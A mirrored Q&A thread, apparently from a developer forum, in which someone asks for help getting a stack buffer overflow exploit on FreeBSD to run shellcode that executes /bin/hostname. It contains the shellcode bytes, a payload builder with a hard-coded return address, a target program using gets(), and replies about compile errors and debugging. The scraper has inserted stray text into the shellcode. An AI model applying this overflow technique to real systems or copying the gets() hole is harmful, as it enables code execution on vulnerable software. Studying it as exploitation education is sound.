开发者

Buffer Overflow-Not getting the Correct output

问答 作者:

the Shell code print the hostname(bin/hostname). but when i execute the code its shows me the the path in reverse order but not printing the HOSTNAME. I am actually doing the buffer over flow . I am using freebsd intel machine. this is my code

can you figure out please where is the error

//Prog 1
    #include<stdio.h>
    main()
    {
    char shellcode[]= “\x31\xc0\x50\x68\x6e\x61\x6d\x65\x68\x68\x6f\x73\x74\x68\x62
       \x69\x6e\x2f\x68\x2f\x2f\x开发者_运维问答2f\x2f\x89\xe3\x50\x54\x53\xb0\x3b
               \x50\xcd\x80”;
     int i;
     char buf[108];
     i=strlen(shellcode); 
     printf(“%d”,i);
     strcpy(buf,shellcode);
     for(i=36;i<104:i++)
     {
      buf[i]='b';
     }
     buf[104]='\x2c';
     buf[105]='\xfa';
     buf[106]='\xbf';
     buf[107]='\xbf';

     printf(“%s”,buf);
         return 0;
    }

The Above program is injected into below program ...... so it creates the bufferover flow and print the hostname

#include <stdio.h>
int 
main (int argc, char **argv){
    char buf[100];
    printf("Please Enter your Name");   
        fflush(stdout);
    gets(buf);
    printf("Hello  %s \n",buf);
}
void notcalled(void){
//puts("cccc");
}

  1. you are defining int I; and using i
  2. the for is using a :i++, instead of a ;i++
  3. strncpy() is missing the size_t param too

There is no buffer overflow in this sample code. You are simply printing the shell code, instead of executing it.

The code as posted doesn't even compile, due to things like quotes, i vs I problem, : instead of ; and strncpy needing 3 arguments (possibly more errors).

The shell code may be correct for freebsd, I can't check that. It definitely isn't correct for linux, though.

Apparently you are still not triggering code execution, even though now I see where you have your buffer overflow. Note however that overflowing the buf variable is trying to overwrite the return address for main, so it should print the text in any case. Also, the compiler may have generated a different stack layout than what you expect, or maybe your stack is not executable (although you should get a segfault in this case).

Use a debugger to single step through the code, beginning with the "return" statement in main and see what is happening. You will soon reach a RET instruction which should pop the starting address of your shellcode into the instruction pointer, effectively jumping to it. I suspect that is not happening for some reason.

继续阅读:bufferbuffer-overflowstackstack-overflow

更多精彩内容

0

上一篇:

下一篇:

精彩评论

暂无评论...
登录 注册
Qedev.com
验证码 换一张
取 消

最新问答

问答排行榜

法律声明:本站内容均为网友上传,网站举办方负责审核和监督,

如存在版权或非法内容,欢迎举报,我们将尽快予以删除。

Copyright © 2018-2020 开发者. All rights reserved.

Powered by 开发者

ICP备案号: 京ICP备10032868号-9